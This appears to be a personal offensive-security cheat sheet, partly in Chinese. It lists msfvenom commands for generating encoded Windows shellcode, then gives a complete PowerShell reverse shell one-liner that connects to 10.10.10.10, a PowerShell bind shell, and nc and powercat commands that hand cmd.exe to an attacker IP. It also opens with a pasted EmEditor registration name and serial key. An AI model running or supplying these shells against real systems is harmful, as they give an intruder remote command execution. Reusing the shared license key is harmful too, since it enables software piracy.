msf-cheatsheet

EmEditor注册码（序列号）分享

姓 名：ttrar.com

序 列 号：DKAZQ-R9TYP-5SM2A-9Z8KD-3E2RK

List all the options for the payload:
msfvenom -p windows/messagebox --list-options

List all available payloads:
msfvenom --list payloads

List all available encoders:
msfvenom --list encoders

Lisst all available architectures:
msfvenom --list archs

List all formats:
msfvenom --list formats

Encoders to test: 
    x86/xor_dynamic
    x86/opt_sub
    x86/alpha_mixed 

Generate exe files:
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/xor_dynamic --format exe --out MsgBoxXor.exe
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/alpha_mixed --format exe --out MsgBoxAlpha.exe
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/opt_sub --format exe --out MsgBoxOptSub.exe

Generate raw payload in C format:

No encoding:
msfvenom -p windows/messagebox --platform Windows --arch x86 --format raw  | ndisasm -b 32 - 
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/xor_dynamic --format c --out MsgBoxXor.c
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/alpha_mixed --format c --out MsgBoxAlpha.c
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/alpha_mixed BufferRegister=EBX --format raw
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/opt_sub --format c --out MsgBoxOptSub.c
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/opt_sub BufferRegister=EBX --format c 

View disassembled shellcode:
msfvenom -p windows/messagebox --platform windows --arch x86 --encoder x86/opt_sub --format raw | ndisasm -b 32 -

References
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/
https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/
https://epi052.gitlab.io/notes-to-self/blog/2020-05-25-osce-exam-practice-part-nine/
https://blog.rapid7.com/2014/02/26/weekly-metasploit-update-encoding-fu-new-powershell-payload-bug-fixes/

Encoders source code
https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/xor_dynamic.rb
https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/alpha_mixed.rb
https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/opt_sub.rb

反弹shell
linux nc -lvvp 443
windows
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


bind shell
windows下运行
bind shell 脚本
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
linux 下运行
nc -nv 10.11.0.22(windowsip 443

powercat
linux
sudo nc -lvvp 443 > receiving_powercat.ps1
powercat -c 10.11.0.4(linuxip -p 443 -i c:\demo\powercat.ps1

reverse shell
linux 
sudo nc -lvvp 443 
windows
powercat -c <linux_ip> -p <port> -e cmd.exe

bind shell
windows
powercat -l -p 443 -e cmd.exe
linux 
nc -nv widowsip 443

linux 
nc -lnvp 443
windows
powercat -c linuxip(10.11.0.4 -p 443 -e cmd.exe -g > reverse_shell.ps1
or
powercat -c <attacker_ip> -p <port) -e cmd.exe -ge > revershell.ps1